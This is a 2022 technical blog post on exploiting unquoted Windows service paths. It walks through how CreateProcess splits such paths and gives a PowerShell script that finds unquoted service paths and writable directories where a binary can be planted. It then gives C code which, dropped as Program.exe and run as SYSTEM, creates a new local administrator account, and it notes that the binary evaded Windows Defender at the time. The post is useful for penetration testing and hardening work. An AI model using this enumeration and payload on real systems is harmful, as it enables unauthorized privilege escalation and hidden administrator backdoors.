Exploiting Unquoted Paths

author: Nathan Acks
date: 2022-08-17

When a service's ImagePath is unquoted and contains spaces, CreateProcess cannot tell where the executable name ends and the arguments begin. It therefore splits the command line at each space and tries each successive prefix as the executable, shortest first, appending .exe when the prefix has no extension, until one exists on disk. Thus C:\Program Files\Application Path\App.exe will cause Windows to look for the following executables, in order:

	C:\Program.exe
	C:\Program Files\Application.exe
	C:\Program Files\Application Path\App.exe

If an executable is found at a shorter path, the remainder of the (unquoted) path is passed to it as command-line arguments. For the attack to work, the current user must be able to write to one of those shorter-path directories (here C:\ or C:\Program Files\), so the unquoted path alone is not enough; the permissions on each candidate's parent directory decide whether it is exploitable.
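The following PowerShell is an added example (not code from the original post): it lists services whose ImagePath is unquoted and contains a space, derives the candidate executables in the order described above, and checks whether the current user can actually create a file in each candidate's parent directory. It assumes a Windows host with PowerShell 5.1 or later; the function names are my own. Note that the writability check performs a real (immediately removed) file creation rather than reasoning about ACLs and group membership.

```powershell
# Added example, not part of the original post. Assumes Windows and PowerShell 5.1+.

# Split an unquoted command line the way CreateProcess does: every space-delimited
# prefix is a candidate executable, shortest first, with ".exe" appended when the
# prefix carries no extension.
function Get-PathCandidate {
    param([Parameter(Mandatory)][string]$UnquotedPath)

    $tokens = $UnquotedPath.Trim() -split ' '
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $prefix = ($tokens[0..($i - 1)]) -join ' '
        if ([System.IO.Path]::GetExtension($prefix) -eq '') { $prefix += '.exe' }
        $prefix
    }
}

# Can the current user create a file in $Directory? Answered by creating and
# deleting an empty, randomly named probe file, which is more reliable than
# interpreting the ACL by hand.
function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Directory)

    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::Create($probe).Dispose()
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

# For each unquoted, space-containing service path, emit one row per candidate
# executable Windows would try before reaching one that exists, along with the
# service account and start mode (needed to judge whether a hijack is worth it)
# and whether the candidate's directory is writable.
function Find-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' -and $_.PathName -match ' ' } |
        ForEach-Object {
            $svc = $_
            foreach ($candidate in Get-PathCandidate -UnquotedPath $svc.PathName) {
                if (Test-Path -LiteralPath $candidate) { break }   # Windows stops at the first hit
                $dir = Split-Path -Path $candidate -Parent
                if (-not $dir) { continue }
                [pscustomobject]@{
                    Service   = $svc.Name
                    StartName = $svc.StartName   # e.g. LocalSystem
                    StartMode = $svc.StartMode   # Auto services run again after a reboot
                    Candidate = $candidate
                    Writable  = Test-DirectoryWritable -Directory $dir
                }
            }
        }
}

# Usage: show only the planting locations the current user can actually write to.
Find-UnquotedServicePath | Where-Object Writable | Format-Table -AutoSize
```

Services such as svchost.exe have unquoted paths with arguments ("C:\Windows\system32\svchost.exe -k netsvcs"), but the first candidate already exists, so they produce no rows. A row with Writable set to True and StartName of LocalSystem is the case the next section exploits.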

Exploiting Services Running as SYSTEM

If a service is running as SYSTEM, the following code can be compiled and dropped into a writable candidate location (as Program.exe or Application.exe in the example above); when the service next starts, it will add a new user with local admin privileges. (USERNAME and PASSWORD obviously need to be updated to fit the current use case.) Since the binary only runs when the service is started, a standard user without start/stop rights on the service typically has to wait for, or trigger, a reboot of a service whose start type is Automatic.

#include <stdlib.h>

int main(void) {
	/* Both commands run in the service's security context, i.e. as SYSTEM,
	 * so creating the account and adding it to Administrators both succeed. */
	system("net user USERNAME PASSWORD /add");
	system("net localgroup administrators USERNAME /add");

	return 0;
}

As of August 17, 2022, binaries compiled from this code are not detected as malicious by Windows Defender.